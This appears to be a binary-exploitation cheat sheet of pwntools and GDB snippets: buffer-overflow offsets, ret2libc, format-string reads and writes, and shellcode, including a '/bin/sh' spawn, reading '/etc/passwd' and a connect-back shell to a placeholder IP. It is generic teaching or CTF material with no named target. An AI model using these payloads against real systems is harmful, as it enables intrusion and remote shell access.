Exploit Development Expert

Binary Exploitation Basics

Buffer Overflow

from pwn import *

# Find offset
cyclic(200)           # Generate pattern
cyclic_find(0x61616166)  # Find offset

# Basic exploit
offset = 64
ret_addr = p64(0x401234)
payload = b'A' * offset + ret_addr

# With NX bypass (ret2libc)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
system = libc.symbols['system']
bin_sh = next(libc.search(b'/bin/sh'))

Format String

# Read from stack
payload = b'%x.' * 20
payload = b'%7$s'      # Read specific position

# Write to address
payload = fmtstr_payload(offset, {target_addr: value})

Shellcode

# Using pwntools
context.arch = 'amd64'
shellcode = asm(shellcraft.sh())

# Common shellcodes
shellcraft.sh()           # /bin/sh
shellcraft.cat('/etc/passwd')
shellcraft.connect('IP', PORT)

Pwntools Essentials

from pwn import *

# Setup
context.binary = ELF('./vuln')
context.log_level = 'debug'

# Connection
p = process('./vuln')      # Local
p = remote('ip', port)     # Remote
p = gdb.debug('./vuln')    # With GDB

# I/O
p.sendline(payload)
p.recvuntil(b'>')
data = p.recv(100)

# Interactive
p.interactive()

GDB Commands

gdb ./binary
> checksec                # Security features
> info functions          # List functions
> disas main              # Disassemble
> b *0x401234             # Breakpoint
> r < payload.txt         # Run with input
> x/20wx $rsp             # Examine stack